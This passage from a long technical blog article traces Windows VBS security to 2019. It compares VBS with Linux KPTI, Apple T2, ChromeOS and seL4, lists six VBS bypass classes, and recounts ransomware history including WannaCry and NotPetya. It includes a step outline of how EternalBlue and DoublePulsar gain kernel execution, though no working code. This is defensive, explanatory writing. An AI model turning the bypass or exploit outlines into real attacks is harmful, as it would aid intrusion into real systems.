&lt;p&gt;&lt;strong&gt;What MDE actually sees.&lt;/strong&gt; The sensor consumes a curated set of Event Tracing for Windows providers and file-system and registry events: &lt;code&gt;Microsoft-Windows-Kernel-Process&lt;/code&gt; for process create and exit; &lt;code&gt;Microsoft-Windows-Kernel-Image&lt;/code&gt; for image load; the file-system minifilter for create, write, and delete; the registry transaction log for create and write; &lt;code&gt;Microsoft-Windows-Kernel-Network&lt;/code&gt; for network connections; the LSA and Kerberos authentication providers for authentication events; the AMSI script-content stream for post-deobfuscation script bodies; the Defender behavioral-engine fire events; and the per-process Code Integrity event stream that surfaces HVCI violations. That last stream is the SOC&apos;s anchor for HVCI-violation telemetry and is the one piece of integration no third-party EDR can replicate, because it depends on running inside the VBS substrate Microsoft also ships.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Detection latency tiering.&lt;/strong&gt; The cloud-correlation pipeline operates in two tiers. Single-event high-confidence detections -- a known-malicious hash, an AMSI Mimikatz string match, a Cobalt Strike named-pipe pattern -- fire in seconds to low minutes. Behavioral aggregation across a process tree -- Ryuk-style staging behavior, Big Game Hunting lateral-movement patterns, Emotet-to-TrickBot-to-Ryuk chains -- fires in minutes to low hours. The two-tier architecture is the detection-philosophy distinction MDE held against its 2019 EDR competitors.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The 2019 EDR competitor field.&lt;/strong&gt; Four credible competitors shipped comparable cloud-correlation architectures by the 2019 cutline. CrowdStrike Falcon was the cloud-native sensor with the heaviest cloud-side intelligence pipeline of the era; CrowdStrike Inc. was founded in 2011 with the cloud-native vision, and the Threat Graph correlation platform debuted with Falcon in June 2013 and has expanded continuously since. Carbon Black carried the legacy Bit9 application-allow-list lineage with a behavioral hybrid layered on top, and was acquired by VMware in October 2019. SentinelOne shipped a lighter kernel agent with on-endpoint behavioral analytics, founded in 2013. Cylance staked out the divergent philosophical position of pre-LLM-era machine-learning static analysis with no behavioral pipeline at all, and was acquired by BlackBerry in February 2019.&lt;/p&gt;
&lt;p&gt;All four offered cloud-correlation EDR by the 2019 cutline. MDE&apos;s distinguishing feature was OS-native integration with Defender, the ETW providers, and the VBS substrate -- specifically, the per-process Code Integrity event stream the third-party agents could not see.&lt;/p&gt;
&lt;p&gt;Together, the six VBS-anchored pillars plus Defender for Endpoint constitute what a 2019 defender meant by &quot;the modern Windows endpoint.&quot; A reasonable summary is the head-to-head table:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pillar&lt;/th&gt;
&lt;th&gt;Privilege model&lt;/th&gt;
&lt;th&gt;Closes&lt;/th&gt;
&lt;th&gt;Known residual&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Credential Guard&lt;/td&gt;
&lt;td&gt;Cross-VTL isolation&lt;/td&gt;
&lt;td&gt;Mimikatz LSASS-scrape family&lt;/td&gt;
&lt;td&gt;Pre-CG TGTs, sign-in keyloggers, stolen-DC krbtgt&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HVCI&lt;/td&gt;
&lt;td&gt;Cross-VTL kernel W^X&lt;/td&gt;
&lt;td&gt;Classical kernel code injection&lt;/td&gt;
&lt;td&gt;BYOVD, data-only kernel attacks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WDAC&lt;/td&gt;
&lt;td&gt;Kernel-enforced CI policy&lt;/td&gt;
&lt;td&gt;Unsigned and unauthorized code&lt;/td&gt;
&lt;td&gt;LOLBins, BYOVD against permissive policies&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AMSI&lt;/td&gt;
&lt;td&gt;User-mode COM hook&lt;/td&gt;
&lt;td&gt;Post-deobfuscation script visibility&lt;/td&gt;
&lt;td&gt;In-process hook patches&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CFG&lt;/td&gt;
&lt;td&gt;Compiler-inserted forward-edge CFI&lt;/td&gt;
&lt;td&gt;ROP gadget chains via indirect call&lt;/td&gt;
&lt;td&gt;Return-address corruption, non-CFG DLLs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Process Mitigation Policies&lt;/td&gt;
&lt;td&gt;Per-app opt-in mitigations&lt;/td&gt;
&lt;td&gt;Per-process exploit primitives&lt;/td&gt;
&lt;td&gt;Apps that do not opt in&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The Windows kernel performance impact of KVA Shadow on older silicon will preview in Section 10 -- MariaDB&apos;s MyISAM workload regressed 37 to 40 percent on Haswell-era CPUs when the Meltdown mitigations landed [@mariadb-kpti]. That is the empirical anchor for &quot;more significant slowdowns&quot; in Terry Myerson&apos;s January 2018 tiered guidance [@ms-myerson-meltdown].&lt;/p&gt;
&lt;p&gt;This is the stack Microsoft shipped. In the same five years, three other OS communities -- Linux, Apple, and ChromeOS -- shipped their own answers to overlapping problems, and the formal-verification community produced a fourth. How do those four answers compare?&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches: Linux KPTI, Apple T2, ChromeOS, seL4&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s VBS is one of four serious architectural answers shipped in the 2015-2019 window. The others made different bets. Reading them side by side is the fastest way to see what VBS chose and what it gave up.&lt;/p&gt;
&lt;h3&gt;7.1 Linux KPTI vs Windows KVA Shadow&lt;/h3&gt;
&lt;p&gt;Linux Kernel Page-Table Isolation (KPTI) and Microsoft&apos;s KVA Shadow are parallel responses to the same forced architectural change. Both descend from Gruss et al.&apos;s 2017 ESORICS paper &quot;KASLR is Dead: Long Live KASLR,&quot; which introduced KAISER -- the technique of stripping kernel mappings out of the user-mode page-table view to defeat side-channel attacks on Kernel Address Space Layout Randomization [@gruss-kaiser]. KAISER landed before Meltdown was public. When the Project Zero coordinated disclosure broke on January 3, 2018, it was the structural retrofit both kernels needed [@pz-meltdown-spectre].&lt;/p&gt;
&lt;p&gt;Linux merged KPTI into mainline before the 4.15 release in January 2018, with backports into 4.14, 4.9, and 4.4 LTS branches gated by &lt;code&gt;CONFIG_PAGE_TABLE_ISOLATION&lt;/code&gt; [@lwn-kpti] [@kroah-meltdown]. Microsoft shipped KVA Shadow in the January 9, 2018 cumulative update. Both implementations split the per-process page-table into a user-mode shadow and a full kernel-mode view, swap CR3 at every user-kernel transition, and lean on the Process Context Identifier feature in Skylake-and-later silicon to amortize the TLB-flush penalty. The fact that two OSes with very different histories converged on functionally identical code, within days of each other, is the lesson: the x86 page-table format dictated the answer. Neither team designed the mechanism. The hardware bug did.&lt;/p&gt;
&lt;h3&gt;7.2 Apple T2: a second processor instead of a second privilege level&lt;/h3&gt;
&lt;p&gt;Apple shipped the &lt;a href=&quot;https://paragmali.com/blog/apple-secure-enclave-vs-microsoft-pluton-two-roads-to-hardwa/&quot; rel=&quot;noopener&quot;&gt;T2 chip&lt;/a&gt; in the iMac Pro on December 14, 2017, and rolled it across the Mac line through 2018 [@apple-t2]. The T2 is a separate Arm-based co-processor with its own boot ROM, AES engine, Secure Enclave, and Memory Protection Engine that encrypts the enclave&apos;s DRAM region with an ephemeral key [@apple-secure-enclave]. Where Microsoft answered the same-privilege paradox by adding a second privilege level on the same CPU, Apple answered it by adding a second physical CPU.&lt;/p&gt;
&lt;p&gt;The tradeoff is stark. T2 has no cross-VTL Spectre v2 problem because the secret lives on a different silicon die. T2 also costs an extra SoC in every machine&apos;s bill of materials, requires a second firmware-update pipeline, and demanded hardware replacements when the checkm8 bootrom vulnerability hit the T2&apos;s A10-derived bootrom in 2020 [@ironpeak-t2].The T2&apos;s predecessor in the 2016 Touch Bar MacBook Pro, the T1, was S2-based; the T2 itself derives from the A10 Fusion CPU found in the iPhone 7, per ironpeak&apos;s October 2020 analysis. VBS runs on existing Intel and AMD silicon with no incremental hardware cost; T2 requires Apple to ship custom silicon in every box. Both architectures relocate the secret. They relocate it to different places.&lt;/p&gt;
&lt;h3&gt;7.3 ChromeOS: do not ship a Secure Kernel because you do not ship a general-purpose kernel&lt;/h3&gt;
&lt;p&gt;ChromeOS does not deploy a Secure Kernel. It deploys verified boot. The architecture is: firmware-write-protected hardware root, signed kernel partition with the dm-verity root hash baked in, and a read-only root filesystem mounted with dm-verity active so every block read is checked against a signed Merkle tree at runtime [@chromeos-verified-boot] [@dm-verity]. The user-facing surface is the Chrome browser, with per-site renderers and utility processes confined by seccomp-bpf sandboxes. There is no LSASS to scrape, no Active Directory TGT to steal, no general-purpose third-party kernel-driver supply to attack.&lt;/p&gt;
&lt;p&gt;The architectural lesson is that VBS solves the problem of &quot;we shipped a large general-purpose kernel and we cannot retract that decision.&quot; ChromeOS sidesteps the problem by not shipping that kernel in the first place. ChromeOS is the principled alternative for an OS whose threat model assumes a single-application workload.&lt;/p&gt;
&lt;h3&gt;7.4 seL4: the verification path VBS chose not to take&lt;/h3&gt;
&lt;p&gt;seL4 is approximately 8,700 lines of C plus 600 lines of assembly, machine-checked against an Isabelle/HOL abstract specification with roughly 200,000 lines of proof script, and verified end-to-end from spec to C to binary [@klein-sel4-sosp2009] [@klein-sel4-cacm] [@sewell-sel4-pldi]. The 2009 SOSP paper established the proof chain, the 2010 CACM Research Highlight recapped it for a wider audience, and the 2013 PLDI follow-on closed the compiler gap by translation-validating GCC output against the C source. The total effort: on the order of 20 person-years for a microkernel one-tenth the size of &lt;code&gt;securekernel.exe&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s Secure Kernel is roughly 150 kilobytes of unverified C code [@ionescu-bh2015]. A meaningful verification would require an Isabelle-level specification of the secure-call interface, refinement proofs through the C source, translation validation to the shipped binary, a formal model of Hyper-V&apos;s SLAT enforcement, and a credible story for microarchitectural side channels that seL4 in 2009 did not have to address. A plausible order-of-magnitude estimate is 100 to 200 person-years for the structural pieces alone. No shipping general-purpose OS -- macOS, iOS, ChromeOS, or Windows -- has chosen that path. seL4 itself runs in specialized embedded and defense deployments, not on desktops.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Trust root&lt;/th&gt;
&lt;th&gt;Verification&lt;/th&gt;
&lt;th&gt;Strengths&lt;/th&gt;
&lt;th&gt;Open residuals&lt;/th&gt;
&lt;th&gt;Deployment scale&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Windows VBS (2015)&lt;/td&gt;
&lt;td&gt;Hyper-V hypervisor + UEFI Secure Boot&lt;/td&gt;
&lt;td&gt;None (unverified C)&lt;/td&gt;
&lt;td&gt;Ships on existing silicon at Windows scale&lt;/td&gt;
&lt;td&gt;BYOVD, secure-call bugs, cross-VTL side channels&lt;/td&gt;
&lt;td&gt;Hundreds of millions of endpoints&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux KPTI (2018)&lt;/td&gt;
&lt;td&gt;Page-table split per process&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Forced retrofit; correct in mainline within weeks&lt;/td&gt;
&lt;td&gt;Spectre family beyond v3&lt;/td&gt;
&lt;td&gt;Server-side and developer workstation majority&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Apple T2 (2017)&lt;/td&gt;
&lt;td&gt;Second physical processor&lt;/td&gt;
&lt;td&gt;None (different threat model)&lt;/td&gt;
&lt;td&gt;No cross-VTL side-channel surface&lt;/td&gt;
&lt;td&gt;Firmware bugs require hardware fix&lt;/td&gt;
&lt;td&gt;All Intel Macs 2018-2022&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;seL4 (2009)&lt;/td&gt;
&lt;td&gt;Microkernel + Isabelle/HOL proof chain&lt;/td&gt;
&lt;td&gt;Functional correctness, integrity, non-interference&lt;/td&gt;
&lt;td&gt;Formally guaranteed against named bug classes&lt;/td&gt;
&lt;td&gt;Outside-TCB hardware and side channels&lt;/td&gt;
&lt;td&gt;Specialized embedded / defense&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Each of these four answers makes a different tradeoff against the same problem. Windows chose &quot;second privilege level, large attack surface, ship-at-scale.&quot; What does that tradeoff leave on the table -- where are VBS&apos;s irreducible residuals?&lt;/p&gt;
&lt;h2&gt;8. What VBS Cannot Defend Against&lt;/h2&gt;
&lt;p&gt;Every architecturally honest defense names its bypass classes before its critics do. VBS, at the 2019 cutline, has six enumerable bypasses plus one structural caveat about availability. None of them undermines the architectural claim that the LSASS-scrape attack class is closed. All of them shape the operator&apos;s deployment decisions.&lt;/p&gt;

An attack class in which an adversary loads a legitimately Microsoft-co-signed third-party kernel driver that contains an exploitable bug. The driver passes Driver Signing Enforcement and HVCI&apos;s code-integrity check because it is signed; the bug gives the attacker arbitrary kernel-mode primitives (read, write, execute) without requiring a Microsoft-issued signature. BYOVD is the dominant in-the-wild HVCI and Credential Guard bypass class through the 2019 cutline.
&lt;p&gt;&lt;strong&gt;Bypass class one -- BYOVD.&lt;/strong&gt; A vulnerable signed driver provides the same kernel-mode primitives PatchGuard-era rootkits relied on. With kernel-mode arbitrary write, an attacker can disable HVCI on a per-process basis, clear the PPL bits on a target, or hook secure-call dispatch sites. Microsoft formally acknowledged BYOVD as a class with the October 2022 Vulnerable Driver Blocklist update KB5020779 [@ms-vuln-driver-kb], operationalized through the same &lt;code&gt;microsoft-recommended-driver-block-rules&lt;/code&gt; document used by Windows Defender Application Control [@ms-vuln-driver-blockrules]. That arrived three years after the cutline of this article, which is part of the lesson: the dominant residual at 2019 was not closed by Windows 10 itself.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bypass class two -- hypervisor and secure-kernel vulnerabilities.&lt;/strong&gt; The Secure Kernel is not infallible code. Saar Amar and Daniel King&apos;s Black Hat USA 2020 talk &quot;Breaking VSM by Attacking SecureKernel&quot; disclosed CVE-2020-0917 and CVE-2020-0918 in the secure-call interface handlers &lt;code&gt;SkmmUnmapMdl&lt;/code&gt; and &lt;code&gt;SkmiReleaseUnknownPTEs&lt;/code&gt; [@amar-king-bh2020]. The Amar-King work landed after this article&apos;s window, but the bypass-class anchor it establishes -- VTL0 to VTL1 escape via the secure-call interface -- was already known to insiders by 2019. The steady-state finding rate for that class is on the order of one to three critical bugs per year.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bypass class three -- hardware and DMA attacks.&lt;/strong&gt; A peripheral device attached over Thunderbolt or PCIe can, in the absence of an Input-Output Memory Management Unit enforcement, read and write physical memory directly. The 2019 NDSS paper &quot;Thunderclap&quot; demonstrated DMA reads of VTL0 and VTL1 memory on machines without Kernel DMA Protection enabled [@markettos-thunderclap]. The Windows mitigation is IOMMU enforcement plus Kernel DMA Protection, both of which require firmware support that mixed-vintage hardware does not always have.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bypass class four -- microarchitectural side channels.&lt;/strong&gt; Spectre variant 2 -- branch target injection -- is the only Spectre-family variant whose threat model overlaps the VBS boundary, because mispredicting an indirect call inside a secure-call handler can leak data across the VTL boundary. The mitigation is enabling Indirect Branch Restricted Speculation around the secure-call entry. Section 10 walks the larger story; here it is enough to note that microarchitectural side channels are an open surface against VBS that grows with each new variant.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bypass class five -- trustlet-signing-root compromise.&lt;/strong&gt; Every trustlet is identified by two Authenticode EKUs that Microsoft signs at Signature Level 12 [@ionescu-bh2015]. If an attacker controls either the signing key or the issuing infrastructure that hands out the IUM EKU, they can ship a malicious binary that the Secure Kernel admits as a legitimate trustlet -- with the same VTL1 access as LSAISO.&lt;/p&gt;
&lt;p&gt;This class was theoretical at the 2019 cutline. Microsoft&apos;s July 2023 Storm-0558 disclosure put it on the forward roadmap: an Azure consumer-MSA signing key was used to forge enterprise tokens [@ms-storm-0558], and the September 2023 root-cause investigation traced the original key acquisition to a crash dump that crossed from production into a corporate debugging environment that the actor had already compromised [@msrc-storm-0558-keyacq]. The Storm-0558 incident was a token-signing-key compromise rather than a trustlet-signing-key compromise, but the architectural lesson is identical. A signing root is a single point of trust whose compromise admits arbitrary binaries to the protected privilege level.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bypass class six -- the VTL0 agent surface.&lt;/strong&gt; Most VBS features ship a VTL0 process that brokers requests to a VTL1 trustlet. LSA in VTL0 brokers credential operations to LSAISO. The System Guard runtime attestation agent and the Windows Defender Application Guard broker likewise mediate between user-mode applications and their VTL1 counterparts.&lt;/p&gt;
&lt;p&gt;Bugs in those agents are still VTL0 bugs. An agent that mishandles user-controlled input before the secure-call dispatch -- a parsing error, a use-after-free, a type confusion -- can leak partial information or trigger unintended VTL1 operations even when the Secure Kernel&apos;s API is sound. The failure surface is in VTL0; the consequences can reach into VTL1 by routing through the agent. This is the everyday-engineering residual that shows up in routine MSRC advisories rather than in conference papers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Caveat -- availability is not a VBS invariant.&lt;/strong&gt; The Hyper-V Top-Level Functional Specification is explicit on this point [@ms-tlfs-vsm]. VTL0 can deny service to VTL1 by refusing to schedule the Secure Kernel, by refusing to provide pages for paging, or by refusing to dispatch secure-calls. Confidentiality and integrity are protected. Availability is not. A compromised NT kernel can stop a trustlet from running. The VBS designers made that tradeoff deliberately, because guaranteeing availability would require the Secure Kernel to manage its own scheduler and paging, which would balloon its trusted code base out of audit range.&lt;/p&gt;

VTL0 can DOS VTL1 by design. -- Microsoft Hyper-V Top-Level Functional Specification, Virtual Secure Mode
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bypass class&lt;/th&gt;
&lt;th&gt;Attack family&lt;/th&gt;
&lt;th&gt;Residual mitigation at 2019&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;BYOVD&lt;/td&gt;
&lt;td&gt;Vulnerable signed driver as kernel-mode primitive&lt;/td&gt;
&lt;td&gt;Microsoft-recommended block rules (manual at 2019; default-on with KB5020779 in Oct 2022)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hypervisor / Secure Kernel bugs&lt;/td&gt;
&lt;td&gt;Secure-call interface vulnerabilities&lt;/td&gt;
&lt;td&gt;Patch velocity; reduce secure-call surface; formal verification research&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hardware / DMA&lt;/td&gt;
&lt;td&gt;Pre-IOMMU PCIe / Thunderbolt DMA reads&lt;/td&gt;
&lt;td&gt;Kernel DMA Protection + IOMMU enforcement (firmware-dependent)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microarchitectural side channels&lt;/td&gt;
&lt;td&gt;Spectre v2 cross-VTL leakage&lt;/td&gt;
&lt;td&gt;IBRS on secure-call entry; per-variant microcode mitigations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trustlet-signing-root compromise&lt;/td&gt;
&lt;td&gt;Forged or stolen IUM EKU signing key&lt;/td&gt;
&lt;td&gt;Signing-infrastructure hardening; no operator-side control at 2019&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VTL0 agent surface&lt;/td&gt;
&lt;td&gt;Bugs in LSA, System Guard agent, WDAG broker&lt;/td&gt;
&lt;td&gt;Conventional MSRC patching; harden agent input validation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Five observations on the residual map. BYOVD is the &lt;em&gt;dominant&lt;/em&gt; in-the-wild residual at the 2019 cutline -- it is what attackers actually used to bypass HVCI and Credential Guard, and the canonical Microsoft mitigation came three years late. The secure-call interface is the &lt;em&gt;quietest&lt;/em&gt; residual: most readers had never heard of it before Amar-King in 2020. Microarchitectural side channels are the &lt;em&gt;interaction&lt;/em&gt; class that links the bypass map in Section 8 to the third axis in Section 10. Trustlet-signing-root compromise is the &lt;em&gt;forward&lt;/em&gt; class -- theoretical at 2019, made concrete by Storm-0558 in 2023. VTL0 agent bugs are the &lt;em&gt;everyday-engineering&lt;/em&gt; class that shows up in routine MSRC advisories. Knowing which residual matters for which threat model is half of operational VBS deployment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every architecturally honest defense names its bypass classes before its critics do. VBS has six: BYOVD, hypervisor secure-call bugs, hardware DMA, microarchitectural side channels, trustlet-signing-root compromise, and the VTL0 agent surface. The architectural gap is small. The deployment gap, as the next section will show, is much larger.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;These are the architectural residuals. The operational residuals turned out to be bigger by orders of magnitude. The path from a kernel-isolated 2017 Enterprise laptop to a paralyzed hospital starts with a missed patch.&lt;/p&gt;
&lt;h2&gt;9. The Offensive Story: Ransomware Industrialization (2017-2019)&lt;/h2&gt;
&lt;p&gt;Between May 12, 2017 and November 21, 2019, the criminal Windows-attack industry went through five generations of business-model evolution in thirty months. Worm-spray ransomware. State-actor wiper. Targeted enterprise extortion. Ransomware-as-a-Service. Encryption plus exfiltration -- the double-extortion playbook. None of the five required novel exploitation against VBS-class defenses. They required only that VBS-class defenses not be deployed.&lt;/p&gt;
&lt;p&gt;The 2017-2019 arc has a predecessor that explains the rest. In September 2013, Symantec Security Response reported a new family of Windows ransomware called CryptoLocker, distributed by Evgeniy Bogachev&apos;s peer-to-peer Gameover Zeus botnet, encrypting victim files with per-victim 2048-bit RSA keys and demanding payment in Bitcoin or MoneyPak. Ransom demands ran in the low three figures to low four figures: enough to be commercially viable against consumers, capped by what consumers could pay.&lt;/p&gt;
&lt;p&gt;On June 2, 2014, a joint operation -- the FBI, Europol, the UK National Crime Agency, Dutch and German law-enforcement, plus Symantec, Dell SecureWorks, CrowdStrike, F-Secure, Microsoft, Trend Micro, and McAfee -- executed Operation Tovar [@doj-operation-tovar] [@europol-operation-tovar] [@fbi-goz]. The operation seized the Gameover Zeus command-and-control and sinkholed the peer-to-peer overlay; FireEye and Fox-IT used the recovered keypair database to stand up a free decryption portal for CryptoLocker victims.&lt;/p&gt;
&lt;p&gt;Operation Tovar disrupted the vector. It did not disrupt the business model. Within months, CryptoWall surpassed CryptoLocker in infection volume under different operators [@secureworks-cryptowall]. The lesson the next five years would teach is that &lt;em&gt;takedown alone does not solve the ransomware problem&lt;/em&gt;: the underlying economics -- encryption plus extortion against a Bitcoin-receivable -- are the asset, and the operators are commodity. From CryptoLocker forward, the criminal arc forks into the worm-spray fork (WannaCry, NotPetya, Bad Rabbit) and the targeted-enterprise fork (SamSam, Ryuk, REvil, Maze) that converge at Maze double extortion in November 2019.&lt;/p&gt;
&lt;h3&gt;9.1 WannaCry (May 12, 2017)&lt;/h3&gt;
&lt;p&gt;The patch-gap timeline is the spine of the WannaCry story. Microsoft published Security Bulletin MS17-010 on March 14, 2017, patching CVE-2017-0143 through CVE-2017-0148 in the &lt;a href=&quot;https://paragmali.com/blog/the-connection-that-refused-to-downgrade-twenty-five-years-o/&quot; rel=&quot;noopener&quot;&gt;SMBv1 server&lt;/a&gt; [@ms-ms17-010] [@nvd-cve-2017-0144]. Thirty-one days later, on April 14, 2017, the Shadow Brokers leaked the NSA Equation Group&apos;s &quot;Lost in Translation&quot; toolkit, which included the EternalBlue exploit weaponizing CVE-2017-0144 over SMBv1 and DoublePulsar, a kernel-mode SMB backdoor [@wiki-eternalblue]. Twenty-eight days after that, on May 12, 2017, WannaCry began propagating. Total patch-to-outbreak window: fifty-nine days.&lt;/p&gt;
&lt;p&gt;The exploit, mechanically, is two pieces. EternalBlue exploits a race condition in the SMBv1 Transaction2 subcommand processing in &lt;code&gt;srv.sys&lt;/code&gt;, achieving controlled kernel-pool corruption that lets the attacker write a controlled &lt;code&gt;SrvNet&lt;/code&gt; buffer into a controlled location -- enough to land kernel-mode code execution. DoublePulsar plants a kernel-mode backdoor that listens for follow-on shellcode over SMB. Sean Dillon&apos;s RiskSense paper &lt;em&gt;EternalBlue: Exploit Analysis and Port to Microsoft Windows 10&lt;/em&gt; (2018) is the canonical reverse-engineering account [@dillon-risksense-eternalblue].&lt;/p&gt;

sequenceDiagram
    participant Atk as Attacker
    participant Srv as srv.sys (SMBv1)
    participant Krn as Kernel pool
    participant DP as DoublePulsar
    Atk-&amp;gt;&amp;gt;Srv: SMBv1 Trans2 request with crafted parameters
    Srv-&amp;gt;&amp;gt;Krn: pool allocation hits race condition
    Atk-&amp;gt;&amp;gt;Srv: groom SrvNet buffer
    Srv-&amp;gt;&amp;gt;Krn: controlled overwrite, ring 0 execution
    Krn-&amp;gt;&amp;gt;DP: install kernel-mode backdoor
    Atk-&amp;gt;&amp;gt;DP: deliver ransomware payload over SMB
    DP--&amp;gt;&amp;gt;Atk: payload running as SYSTEM
&lt;p&gt;The propagation halted at 15:03 UTC on May 12, 2017 when Marcus Hutchins, a then-22-year-old British researcher writing as MalwareTech, registered an unregistered domain hard-coded into the WannaCry binary as a kill-switch test. Hutchins thought he was sinkholing for telemetry. He had accidentally stopped the worm [@malwaretech-killswitch].The kill-switch domain registration is well-attested at 15:03 UTC; the moment global propagation visibly slowed lagged the registration by minutes to hours as the sinkhole DNS record propagated through caching resolvers worldwide.&lt;/p&gt;
&lt;p&gt;Damage at the National Health Service was severe but not maximal: the National Audit Office&apos;s October 2017 investigation reports that the attack disrupted at least 34 percent of trusts in England, NHS England identified 6,912 cancelled appointments, and the estimate of total cancelled appointments was over 19,000 [@nao-wannacry]. The NAO is clear that no NHS organization paid the ransom. The British government and NHS England later attributed the WannaCry outbreak to North Korea, formally on December 19, 2017, in a White House press briefing that coordinated attribution with the United Kingdom, Australia, Canada, New Zealand, and Japan [@wh-wannacry].&lt;/p&gt;
&lt;p&gt;CISA, then US-CERT, had issued an alert during the May 12 outbreak window [@cisa-may-2017-ransomware]. Global damage estimates ran to around four billion US dollars across cancelled production, recovery costs, and downtime at Renault-Nissan plants, FedEx, Telefonica, Deutsche Bahn, and the NHS.&lt;/p&gt;
&lt;p&gt;The architectural lesson of WannaCry is not that VBS failed. VBS was not running on the affected NHS workstations, which were largely unpatched Windows 7 boxes. The architectural lesson of WannaCry is that &lt;em&gt;patch velocity remained the dominant defense in 2017&lt;/em&gt;, and that the deployment-gap problem was, and remains, the larger lever than the architectural-gap problem.&lt;/p&gt;
&lt;h3&gt;9.2 NotPetya (June 27, 2017)&lt;/h3&gt;
&lt;p&gt;Six weeks later, on June 27, 2017, the world saw what an actually-state-actor-grade Windows campaign looks like. The vector was a supply-chain compromise of M.E.Doc, the Ukrainian tax-and-accounting software whose update channel pushed the malicious binary to thousands of M.E.Doc-running endpoints [@talos-medoc]. ESET&apos;s TeleBots write-up confirmed the operator: the BlackEnergy-lineage Sandworm group [@eset-telebots].&lt;/p&gt;
&lt;p&gt;The payload self-propagated using EternalBlue plus EternalRomance plus credential reuse via a bundled Mimikatz-style routine, then encrypted Master File Tables and boot sectors. Kaspersky&apos;s analysis -- &quot;Schroedinger&apos;s Pet(ya)&quot; -- is the canonical evidence that the malware was a wiper masquerading as ransomware: &quot;After an analysis of the encryption routine of the malware used in the Petya/ExPetr attacks, we have thought that the threat actor cannot decrypt victims&apos; disk, even if a payment was made&quot; [@kaspersky-petya]. The Salsa20 key derivation made decryption impossible by design.&lt;/p&gt;
&lt;p&gt;The Maersk story, told most memorably in Andy Greenberg&apos;s WIRED feature and at book length in his 2019 Doubleday volume &lt;em&gt;Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin&apos;s Most Dangerous Hackers&lt;/em&gt;, is the iconic case [@wired-notpetya] [@greenberg-sandworm-book]. Maersk&apos;s IT department recovered from a single, accidentally-offline domain controller in Ghana [@wired-notpetya] [@greenberg-sandworm-book].&lt;/p&gt;
&lt;p&gt;The aggregate damage estimate from the February 15, 2018 White House attribution statement is &quot;billions of dollars in damage&quot; with the headline language: &quot;In June 2017, the Russian military launched the most destructive and costly cyber-attack in history&quot; [@wh-notpetya]. The UK&apos;s National Cyber Security Centre issued parallel attribution to the Russian military [@ncsc-russia-notpetya]. The US Department of Justice indicted six GRU Unit 74455 officers on October 19, 2020 -- Andrienko, Detistov, Frolov, Kovalev, Ochichenko, Pliskin -- for NotPetya, Olympic Destroyer, and related campaigns [@doj-gru-notpetya].&lt;/p&gt;

In June 2017, the Russian military launched the most destructive and costly cyber-attack in history. -- White House Press Secretary statement, February 15, 2018

The October 19, 2020 indictment in the Western District of Pennsylvania names the six GRU officers and ties them to NotPetya, Olympic Destroyer, the OPCW intrusion, the 2015 and 2016 Ukrainian power grid attacks, and the 2017 French election hack-and-leak [@doj-gru-notpetya]. The indictment lands three years after this article&apos;s primary window closes, but the canonical US attribution record for NotPetya lives in that document.
&lt;p&gt;The architectural lesson of NotPetya is &lt;em&gt;not&lt;/em&gt; patch velocity. NotPetya owned its initial victims through a trusted update channel; patch cadence does not help against an installer signed by your software vendor. The lesson is that &lt;strong&gt;build-pipeline integrity is the next frontier&lt;/strong&gt;, and SolarWinds in December 2020 -- the Part 5 chapter of this series -- will make that lesson industry-canonical.&lt;/p&gt;
&lt;h3&gt;9.3 Bad Rabbit (October 24, 2017)&lt;/h3&gt;
